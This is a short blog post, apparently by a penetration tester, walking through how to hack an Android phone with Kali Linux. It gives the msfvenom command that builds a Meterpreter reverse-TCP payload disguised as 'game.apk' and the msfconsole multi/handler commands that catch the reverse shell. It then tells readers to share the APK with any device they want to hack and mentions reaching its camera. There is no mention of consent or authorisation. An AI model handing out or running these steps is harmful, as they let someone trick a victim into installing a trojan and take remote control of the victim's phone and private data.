Hacking An Android Device…

Tanishq Sachin Shah
3 min readMay 11, 2021

--

To hack an android device, you’ll need your hacking machine, which is Kali Linux. Don’t worry, you can use it as a virtual machine. To do so, you’ll need a tool called virtual box and a Kali Linux virtual box image, which you can get from their official website -

https://www.virtualbox.org/ https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

Open the terminal after setting up the lab and installing Kali Linux, and type the simple command to download and upgrade the repositories — sudo apt-get update && apt-get upgrade

Now you are ready to start hacking -

We’ll start by creating a payload, which is an APK that will be sent to the device we’ll be hacking.
To do so, we’ll use msfvenom, a tool that comes pre-installed with Kali Linux.
To run it, type sudo msfvenom in the command line.
There, we can define which payload we need, as well as our LHOST, which is our IP address, and the LPORT. You will find your IP address by typing sudo ifconfig.

Now to create a payload by using this command — sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=(your ip) LPORT=8080 -o game.apk You have to enter your LHOST in that box.

Now that we’ve successfully created a payload, you’ll find it in your Home folder, where you can share it with whatever device you want to hack. However, before sharing, you should listen for incoming connections. To do so, we’ll use the tool msfconsole. Just type sudo msfconsole and it will run. Now we will use multi handler to use it type — use multi/handler then again we have to specify PAYLOAD, LHOST and LPORT to listen on it To set this use the following commands -

  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST 192.168.100.99
  • set LPORT 8080
  • exploit

Now we are ready share that apk and install it when you click on the apk you will get the reverse shell here and boom the device is hacked…….

To see what can you do type help and you will get the list of commands and you can access the many cool things like camera…..

Brain Tattoo:-

  • To begin, create a virtual lab and install Kali Linux.
  • “sudo ifconfig” will show your IP address.
  • Create a payload with msfvenom.
  • To listen for incoming connections, run mfsconsole multi/handler.
  • You can now share the apk with the target device.
  • See what fun stuff you can do after having meterpreter session type help.

--

--

Tanishq Sachin Shah
Tanishq Sachin Shah

Written by Tanishq Sachin Shah

Triage Analyst @HackerOne | Blogger | Penetration Tester | Red Team | Skating Coach

No responses yet